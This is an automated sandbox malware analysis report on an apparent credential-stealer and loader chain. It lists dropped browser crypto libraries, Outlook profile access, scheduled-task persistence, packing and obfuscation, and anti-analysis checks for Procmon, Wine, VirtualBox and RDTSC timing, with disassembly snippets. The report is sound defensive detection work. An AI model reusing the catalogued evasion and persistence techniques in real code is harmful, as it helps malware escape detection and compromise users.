Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: Rnteb46TuM.exe Static file information: File size 2509824 > 1048576
Source: Rnteb46TuM.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x221800
Source: Binary string: mozglue.pdbP source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Unpacked PE file: 0.2.Rnteb46TuM.exe.500000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Unpacked PE file: 8.2.AFBFHDBKJE.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.f10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.f10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Unpacked PE file: 12.2.6e6e496542.exe.410000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 15.2.explorti.exe.f10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C7FC410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: random[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x272832
Source: Rnteb46TuM.exe Static PE information: real checksum: 0x0 should be: 0x27164b
Source: explorti.exe.8.dr Static PE information: real checksum: 0x1d2111 should be: 0x1d86f0
Source: 6e6e496542.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x272832
Source: AFBFHDBKJE.exe.0.dr Static PE information: real checksum: 0x1d2111 should be: 0x1d86f0
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d2111 should be: 0x1d86f0
PE file contains sections with non-standard names
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: .idata
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: wcjrprme
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: aczpyjwy
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: wcjrprme
Source: amadka[1].exe.0.dr Static PE information: section name: aczpyjwy
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: wcjrprme
Source: explorti.exe.8.dr Static PE information: section name: aczpyjwy
Source: explorti.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB536 push ecx; ret 0_2_6C7CB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F2D82C push ecx; ret 10_2_00F2D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2A70 push 7F7A0002h; ret 12_2_7F7A2A7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1E70 push 7F7A0002h; ret 12_2_7F7A1E7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1B70 push 7F7A0002h; ret 12_2_7F7A1B7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0F70 push 7F7A0002h; ret 12_2_7F7A0F7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1270 push 7F7A0002h; ret 12_2_7F7A127F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1570 push 7F7A0002h; ret 12_2_7F7A157F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1870 push 7F7A0002h; ret 12_2_7F7A187F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2170 push 7F7A0002h; ret 12_2_7F7A217F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2470 push 7F7A0002h; ret 12_2_7F7A247F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2770 push 7F7A0002h; ret 12_2_7F7A277F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2B60 push 7F7A0002h; ret 12_2_7F7A2B6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2860 push 7F7A0002h; ret 12_2_7F7A286F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1C60 push 7F7A0002h; ret 12_2_7F7A1C6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0D60 push 7F7A0002h; ret 12_2_7F7A0D6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1060 push 7F7A0002h; ret 12_2_7F7A106F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1360 push 7F7A0002h; ret 12_2_7F7A136F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1660 push 7F7A0002h; ret 12_2_7F7A166F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1960 push 7F7A0002h; ret 12_2_7F7A196F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1F60 push 7F7A0002h; ret 12_2_7F7A1F6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2260 push 7F7A0002h; ret 12_2_7F7A226F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2560 push 7F7A0002h; ret 12_2_7F7A256F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2C50 push 7F7A0002h; ret 12_2_7F7A2C5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2950 push 7F7A0002h; ret 12_2_7F7A295F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1D50 push 7F7A0002h; ret 12_2_7F7A1D5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0E50 push 7F7A0002h; ret 12_2_7F7A0E5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1150 push 7F7A0002h; ret 12_2_7F7A115F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1450 push 7F7A0002h; ret 12_2_7F7A145F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1750 push 7F7A0002h; ret 12_2_7F7A175F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1A50 push 7F7A0002h; ret 12_2_7F7A1A5F
Source: Rnteb46TuM.exe Static PE information: section name: entropy: 7.9949641655914805
Source: Rnteb46TuM.exe Static PE information: section name: entropy: 7.980309777125587
Source: Rnteb46TuM.exe Static PE information: section name: entropy: 7.952939990721896
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: entropy: 7.981967359811176
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: wcjrprme entropy: 7.953701323474707
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.981967359811176
Source: amadka[1].exe.0.dr Static PE information: section name: wcjrprme entropy: 7.953701323474707
Source: explorti.exe.8.dr Static PE information: section name: entropy: 7.981967359811176
Source: explorti.exe.8.dr Static PE information: section name: wcjrprme entropy: 7.953701323474707
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.994663485275653
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.978967197470916
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.953780146204382
Source: 6e6e496542.exe.10.dr Static PE information: section name: entropy: 7.994663485275653
Source: 6e6e496542.exe.10.dr Static PE information: section name: entropy: 7.978967197470916
Source: 6e6e496542.exe.10.dr Static PE information: section name: entropy: 7.953780146204382
Drops PE files
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C7F55F0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DD23D second address: 2DD245 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2CC2B2 second address: 2CC2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2CC2B8 second address: 2CC2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DC3D9 second address: 2DC3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB18 second address: 2DCB1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB1F second address: 2DCB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDD3F1872h 0x00000010 jno 00007F7FDD3F186Ch 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB48 second address: 2DCB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB4E second address: 2DCB54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E06DE second address: 2E06E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E06E4 second address: 2E06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0862 second address: 2E08EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D3A29h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7FDCFD2298h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov si, 2734h 0x00000033 or dword ptr [ebp+122D19ACh], ebx 0x00000039 call 00007F7FDCFD2299h 0x0000003e jmp 00007F7FDCFD22A4h 0x00000043 push eax 0x00000044 jmp 00007F7FDCFD22A9h 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jbe 00007F7FDCFD2296h 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E08EA second address: 2E0909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7FDD3F1866h 0x00000011 rdtsc
